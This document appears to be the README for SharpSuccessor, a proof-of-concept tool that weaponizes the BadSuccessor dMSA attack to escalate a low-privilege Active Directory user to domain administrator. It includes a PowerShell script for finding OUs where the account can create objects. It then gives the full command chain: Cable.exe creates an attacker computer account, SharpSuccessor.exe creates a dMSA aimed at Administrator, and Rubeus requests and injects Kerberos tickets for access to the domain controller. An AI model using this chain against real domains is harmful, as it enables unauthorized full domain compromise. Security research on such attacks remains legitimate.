SharpSuccessor is a .NET Proof of Concept (POC) for fully weaponizing Yuval Gordon's (@YuG0rd) BadSuccessor attack from Akamai. A low-privilege user with CreateChild permission over any Organizational Unit (OU) in the Active Directory domain can escalate privileges to domain administrator.
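The precondition above is CreateChild over some OU. Before starting, it is worth confirming which OUs the low-privilege account can actually create objects in, so the `/path:` argument later points at one that works. The PowerShell below is an added example, not code from SharpSuccessor or Cable: it walks every OU in the domain and reports ACEs that grant the account (directly or through its token groups, plus Everyone and Authenticated Users) CreateChild, or rights such as WriteDacl and WriteOwner that let the holder grant CreateChild to themselves. The domain `lab.lan` and the account `lowpriv` are assumptions; it needs only normal domain-user read access and no RSAT module.

```powershell
# Added example (not part of SharpSuccessor): find OUs where an account holds
# CreateChild or a right that can be turned into CreateChild.
# Assumptions: domain lab.lan and account lowpriv are placeholders.
param(
    [string]$Domain = "lab.lan",          # assumed domain FQDN
    [string]$SamAccountName = "lowpriv"   # assumed low-privilege account to test
)

Add-Type -AssemblyName System.DirectoryServices
$root = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$Domain")

# Resolve the account and every SID in its token. tokenGroups already expands
# nested group membership; Everyone and Authenticated Users are implicit.
$userSearcher = New-Object System.DirectoryServices.DirectorySearcher($root, "(sAMAccountName=$SamAccountName)")
$userResult = $userSearcher.FindOne()
if (-not $userResult) { throw "Account '$SamAccountName' not found in $Domain" }
$user = $userResult.GetDirectoryEntry()
$user.RefreshCache(@("tokenGroups"))

$sids = New-Object System.Collections.Generic.HashSet[string]
[void]$sids.Add((New-Object System.Security.Principal.SecurityIdentifier($user.Properties["objectSid"][0], 0)).Value)
foreach ($g in $user.Properties["tokenGroups"]) {
    [void]$sids.Add((New-Object System.Security.Principal.SecurityIdentifier($g, 0)).Value)
}
[void]$sids.Add("S-1-1-0")    # Everyone
[void]$sids.Add("S-1-5-11")   # Authenticated Users

# CreateChild is what the attack needs directly; GenericAll includes it, and
# WriteDacl / WriteOwner let the holder rewrite the OU's ACL to obtain it.
$interesting = @(
    [System.DirectoryServices.ActiveDirectoryRights]::CreateChild,
    [System.DirectoryServices.ActiveDirectoryRights]::GenericAll,
    [System.DirectoryServices.ActiveDirectoryRights]::WriteDacl,
    [System.DirectoryServices.ActiveDirectoryRights]::WriteOwner
)

$ouSearcher = New-Object System.DirectoryServices.DirectorySearcher($root, "(objectClass=organizationalUnit)")
$ouSearcher.PageSize = 1000
[void]$ouSearcher.PropertiesToLoad.Add("distinguishedName")

foreach ($r in $ouSearcher.FindAll()) {
    $ou = $r.GetDirectoryEntry()
    # Include inherited ACEs; rights set high in the tree flow down to child OUs.
    $rules = $ou.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
    foreach ($ace in $rules) {
        if ($ace.AccessControlType -ne [System.Security.AccessControl.AccessControlType]::Allow) { continue }
        if (-not $sids.Contains($ace.IdentityReference.Value)) { continue }
        $matched = $interesting | Where-Object { $ace.ActiveDirectoryRights.HasFlag($_) }
        if (-not $matched) { continue }
        [PSCustomObject]@{
            OU         = $ou.Properties["distinguishedName"][0]
            Identity   = $ace.IdentityReference.Value
            Rights     = ($matched -join ", ")
            # All-zero ObjectType: the right covers any child class. A specific
            # GUID restricts CreateChild to one object class, so check it before
            # assuming the OU will accept a dMSA.
            ObjectType = $ace.ObjectType
            Inherited  = $ace.IsInherited
        }
    }
}
```

Deny ACEs are skipped rather than subtracted, so a hit here is a candidate, not a guarantee; the definitive test is whether the object creation in the next steps succeeds. A CreateChild ACE whose ObjectType is a specific class GUID only helps if that class is the dMSA class.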
From the low-privilege user context, first create a computer object with a tool such as Cable. This account is the principal that will later be allowed to act as the dMSA:
Cable.exe computer /add /name:attacker_computer /password:P@ssw0rd
Then use SharpSuccessor to create the dMSA object in an OU where you hold CreateChild and weaponize it against the target account (here Administrator), tying it to the computer account created above:
SharpSuccessor.exe add /target:Administrator /path:"ou=test,dc=lab,dc=lan" /computer:attacker_computer$ /name:attacker_dMSA
Finally, use the previously created computer account to request a ticket as the dMSA. First, request a TGT for the computer account:
Rubeus.exe asktgt /user:attacker_computer$ /password:P@ssw0rd /enctype:aes256 /opsec /nowrap
Then use that TGT (the Base64 blob from the previous output) to obtain a ticket for the dMSA account with the /dmsa option:
Rubeus.exe asktgs /targetuser:attacker_dmsa$ /service:krbtgt/lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIF0DCCBcy...
With the dMSA ticket from the previous step, you can request a service ticket carrying the Administrator context for any SPN, including the Domain Controllers, for post-exploitation. For example, here is a service ticket for SMB (cifs) on the domain controller:
Rubeus.exe asktgs /user:attacker_dmsa$ /service:cifs/WIN-RAEAN26UGJ5.lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIF2DCCBdS...
Now that the ticket is in memory (/ptt), test access to the domain controller, for example by listing one of its administrative shares.
Massive thanks to Jim Sykora and Garrett Foster for the inspirations and assistance for this tool!